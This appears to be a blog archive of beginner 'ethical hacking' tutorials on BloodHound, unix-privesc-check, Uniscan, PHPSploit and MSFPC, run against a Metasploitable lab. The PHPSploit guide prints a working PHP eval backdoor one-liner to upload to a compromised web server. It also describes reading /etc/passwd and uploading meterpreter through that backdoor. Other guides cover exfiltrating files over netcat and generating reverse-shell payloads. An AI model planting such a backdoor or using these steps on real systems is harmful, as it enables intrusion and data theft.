Category: Hacking Tools

Posted on by

Beginners guide to Bloodhound tool

Hello, aspiring ethical hackers. In this article, you will learn about Bloodhound, an open-source tool that helps in identifying attack paths and relationships in Active Directory environment. Its also useful in uncovering hidden information about domain and security misconfigurations in AD (which would be impossible to find otherwise). Bloodhound is one of the favorite tools of both Red team hackers and Blue Team hackers.

Let’s see how this tool works. For this, we will be using Kali Linux as bloodhound is available by default in its repositories.

Once bloodhound is installed successfully you need to change permissions of the “neo4j” folder as shown below. Ne04i is a native graph database that is used by bloodhound.

Next, we need to start neo4j console as shown below.

It provides a remote interface as the URL as shown in the above image. Click on that URL to access the remote interface. The URL opens in a browser. It will prompt you for authentication. The default username and password for logging into Neo4j is (neo4j;neo4j).

Unless you change the default credentials, Ne04j will not work. So change the password.

Now, Neo4j database is all set. To start bloodhound, use command as shown below.

bloodhound

A browser should automatically open with a login option as shown below. Login with the Neo4j username and the new password you set.

A almost white screen should welcome you as shown below.

Bloodhound is successfully installed and ready to be used. To see how this tool works first we need to collect data belonging to a active directory environment. This can be done using a tool provided by the makers of bloodhound known as SharpHound. Data can be collected using SharpHound as shown below.

However, SharpHound has been giving some errors while collecting data lately. See, if it works for you. There is also some sample data available for download to see the working of bloodhound. This can be downloaded from here. This sample data in the form of zip archive can be uploaded to bloodhound as shown below.

Even uploading of this data is posing some problems. But don’t worry. we will soon be updating this article. Please watch out.

Posted on by

UNIX privesc check: Complete guide

Hello, aspiring ethical hackers. In our previous blogpost, you learnt about Linux privilege escalation. In this article, you will learn about UNIX privesc check , a tool that will help you in elevating privileges on a Linux and UNIX system.

UNIX privesc check is a shell script that checks for all simple privilege escalation vectors on a UNIX system. This script finds misconfigurations and other settings that could allow local unprivileged users to elevate privileges on a target Linux system.

Let’s see how this tool works. For this, we will be using Kali Linux as this tool is available by default in its repositories. As target system, we will be using Metasploitable 2 installed in our virtual hacking lab.

As it is a local privilege escalation script, it needs to be run on the target system. Obviously, you need to have access on the target system. Learn various methods to gain access to a Linux system in our Linux hacking article. After gaining access, we can use any method to download the UNIX-privesc-check script to the target system.

Next, it can be executed like any other shell script.

Unix privesc check runs in two modes: standard and detailed. In standard mode it performs a speed optimised check of security settings. It can be run in standard mode as shown below.

./unix-privesc-check standard

In the detailed mode, it performs all checks performed in standard mode but additionally it will also perform checks of permissions of open file handles and other files. This mode sis low but can help you find more weaknesses in 3rd party programs. UNIX privesc check can be run in detailed mode using command shown below.

./unix-privesc-ccheck detailed

It is good practice to save the scan output to a file. This can be done as shown below.

Usually this file with scanned output needs to be transferred to the attacker system for analysis. This can be done using tools like netcat or socat. For example, let’s transfer “detailed_output.txt” file to attacker system for observation. While observing the output file, you need to look out for “warning” signs. These allow in privilege escalation of Linux system.

For example, you can see that SUDO is configured in the above image.

This tool has also found one binary with SUID bit set. Learn about SETUID privilege escalation.

It has even found public and private SSH keys which can be used to login to SSH server on target system. Learn about SSH hacking in our comprehensive guide.

That’s how we use this tool. Learn about Windows privesc check, a tool that helps us in elevating privileges on a Window system.

Posted on by

Beginners guide to Uniscan

Hello, aspiring ethical hackers. In our previous blogposts, you learnt about various vulnerabilities affecting web apps and websites like Local File Inclusion (LFI), Remote File Inclusion (RFI) and remote command execution (RCE) vulnerabilities. In this blogpost, you will learn about Uniscan, a web vulnerability scanner that scans and detects the above mentioned vulnerabilities in a website or web app.

Uniscan is a simple web vulnerability scanner that scans for LFI, RFI and RCE vulnerabilities. Let’s see how this tool works. For this, we will be using Kali Linux as attacker machine as this tool is available by default in its repositories. As target system, we will be using Metasploitable 2 installed as part of our virtual hacking lab.

Scan a single URL (-u)

All we have to do to scan a website with uniscan is to supply the URL with the (-u) argument as shown below.

Scan for directories (-q)

By enabling this option, we can scan for directories on the target website.

Here, is the result.

Scan for files (-w)

with this option, you can scan for files located on the web server.

Here, is the result.

Scan “robots.txt” and “sitemap.xml” files (-e)

With this option, you can scan the target website’s “robots.txt” and “sitemap.xml” files.

Here are the entries of robots.txt file of our target.

Perform dynamic checks (-d)

The option is useful to perform dynamic checks on the target website.

Perform stating checks (-s)

This option is used to perform static checks on the target. This is the scan that helps in detecting LFI, RFI and RCE vulnerabilities.

Here’s the output.

As you can see in the above image, uniscan detected a LFI vulnerability in the target.

Perform stress checks (-r)

Stress checks help us to see if the target is vulnerable to DoS or DDos attacks.

Fingerprint the server (-j)

With this option, we can perform OS fingerprinting on the target. Uniscan can perform ping, traceroute, nslookup, detect open ports and the services running on them.

Here’s the output.

Combining the scans

All these above explained types of scans can be performed at once as shown below.

Run uniscan in background (-b)

With this option, you can send uniscan to background.

Target multiple URLs at once (-f)

Instead of a single URL, we can scan multiple URLs with uniscan at once. All we have to do is save the URLs you want to scan in a text file and use ‘-f’ option to supply this text file to uniscan as shown below.

Posted on by

Beginners guide to PHPSploit

Hello, aspiring ethical hackers. In our previous blogpost, you have learnt what is backdoor. In this blogpost, you will learn about PHPSploit, a backdoor for web servers. PHPSploit is a fully featured command & control (C&C) framework that is used for persistence on web servers after gaining access. Let’s see how PHPSploit works and learn about its functions.

For this, we will be using Kali Linux as PHPSploit is available for download on Kali’s repositories by default. As target system, we will be using Metasploitable2 as part of our virtual hacking lab. Let’s see how it works.

PHPSploit can be started using the command shown below.

phpsploit

To place the PHPSploit backdoor on any target system, all you have to do is insert a PHP one liner into the code of the website. The PHP one liner is given below.

<?php @eval($_SERVER['HTTP-PHPSPLOIT']); ?>

I copy the above script into a PHP file named “bd.php” and upload this file to the target web server after web server hacking.

After uploading this file to the target web server, open PHPSploit on attacker system (Kali) and set the URL of the PHP backdoor as target as shown below. Then we have to run the command “exploit”. This gives us access as shown below.

Once the exploit is successful, the interface of PHPSploit shows the target IP address or the domain name on which we installed the backdoor. To view all the commands PHPSploit supports, type command “help”.

For example, let’s try “phpinfo” command that gives us the information about the web server.

To know the user account with whose privileges you compromised the target system, you have to use the “whoami” command.

PHPSploit also supports file system commands like cd, pwd, cat, ls etc.

Cat command can be used to view the contents of files on the target system. For example, let’s view the “/etc/passwd” file on the target Metasploitable2 system.

We can also download files from the target web server. For example, let’s download “/etc/passwd” file from the target system to the “/tmp” directory of our attacker system.

Here is the downloaded file.

Similarly, we can also upload files to the target system using the “upload” command. For example, let’s upload the meterpreter binary to the target system as shown below.

Posted on by

Beginners guide to msfpc

Hello, aspiring ethical hackers. In our previous blogpost, you learnt how to create payloads with msfvenom. In this blogpost, you will learn about MSFPC (MSFvenom payload creator), a tool that simplifies generation of Metasploit payloads with msfvenom.

MSFvenom payload creator (MSFPC) is a wrapper to generate multiple types of payloads based on users choice. The concept of this tool is to be as simple as possible while generating a payload.

Let’s see how to use this tool. For this, we will be using Kali Linux, as msfpc is installed by default on Kali Linux.

The simplest way to create a payload using MSFPC is to specify the type of payload you want. MSFPC can generate APK, ASP, ASPx, bash (-sh), Java (.jsp), Linux (.elf), OSX (macOS), Perl (.pl), PHP, PowerShell (.ps1), Python, Tomcat (.war) and Windows (.exe or dll) payloads.

For example, let’s see how to generate an exe payload.

The only option we need to set to create a payload with msfpc is the attacker system’s IP address or the listener address which can be selected from the given options. All other options are automatically set.

By default, this tool creates a reverse shell payload. We can also create a bind shell payload as shown below.

By default the listening port of the generated payload is set to 443. This can be changed as shown below.

We can also create payloads with this tool by specifying the target operating system.

MSFPC creates staged payloads by default. We can also create stageless payload as as shown below.